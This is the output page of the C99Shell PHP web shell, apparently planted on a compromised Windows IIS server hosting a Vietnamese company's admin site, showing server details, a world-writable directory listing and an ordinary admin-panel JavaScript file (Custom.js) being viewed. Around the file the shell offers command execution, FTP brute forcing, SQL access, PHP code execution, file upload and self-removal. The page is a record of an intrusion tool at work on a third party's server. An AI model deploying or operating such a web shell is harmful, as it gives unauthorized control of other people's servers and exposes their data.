!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

D:\vhosts\traduong.com.vn\admin.traduong.com.vn\Content\js\   drwxrwxrwx
Free 187.96 GB of 400 GB (46.99%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Custom.js (2.85 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
function StringToSlug(str) {
    // remove accents
    var from = ["[àáãảạăằắẳẵặâầấẩẫậ]", "[èéẻẽẹêềếểễệ]", "đ", "[ùúủũụưừứửữự]", "[òóỏõọôồốổỗộơờớởỡợ]", "[ìíỉĩị]", "[ýỳỹỵỷ]"],
        to = ["a", "e", "d", "u", "o", "i", "y"];
    for (var i = 0, l = from.length; i < l; i++) {
        str = str.replace(RegExp(from[i], "gi"), to[i]);
    }

    str = str.toLowerCase()
        .trim()
        .replace(/[^a-z0-9\-]/g, '-')
        .replace(/-+/g, '-');

    return str;
}

$(function () {
    $('.header .nav-left .desktop-toggle').on('click', function () {
        $.cookie("is-folded", $("body > div.app").hasClass("is-folded"));
        setTimeout(function () {
            diskchart_load();
        }, 200);
       
    })
    if ($.cookie("is-folded") == "true") {
        $(".app").addClass("is-folded");
    }
})

var CKEDITOR_Config1 = {
    toolbar: [
        { name: 'clipboard', items: ['Undo', 'Redo'] },
        { name: 'basicstyles', items: ['Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'RemoveFormat'] },
        { name: 'paragraph', items: ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock'] },
        { name: 'faicon', items: ['ckeditorfa'] },
        '/',
        { name: 'styles', items: ['Format', 'Font', 'FontSize'] },
        { name: 'links', items: ['Link', 'Unlink'] },
        { name: 'colors', items: ['TextColor', 'BGColor'] },
        { name: 'tools', items: ['Maximize', 'ShowBlocks'] },
        { name: 'others', items: ['-'] },
        { name: 'grid', items: ['btgrid'] },
        { name: 'about', items: ['About'] }
    ],
    height: 300,
};

var CKEDITOR_Config2 = {
    toolbar: [
        { name: 'document', items: ['Source', '-'] },
        { name: 'clipboard', items: ['Undo', 'Redo'] },
        { name: 'basicstyles', items: ['Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'CopyFormatting', 'RemoveFormat'] },
        { name: 'editing', items: ['Find', 'Replace', '-', 'SelectAll', '-'] },

        { name: 'insert', items: ['Image', 'Table', 'HorizontalRule', 'ckeditorfa', 'SpecialChar', 'PageBreak', 'Iframe'] },
        '/',
       
        { name: 'styles', items: ['Format', 'Font', 'FontSize'] },
        { name: 'colors', items: ['TextColor', 'BGColor'] },
        { name: 'paragraph', items: ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl'] },
        { name: 'links', items: ['Link', 'Unlink', 'Anchor'] },
        
        { name: 'tools', items: ['Maximize', 'ShowBlocks','btgrid'] },
    ],
    height: 300,
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5968 ]--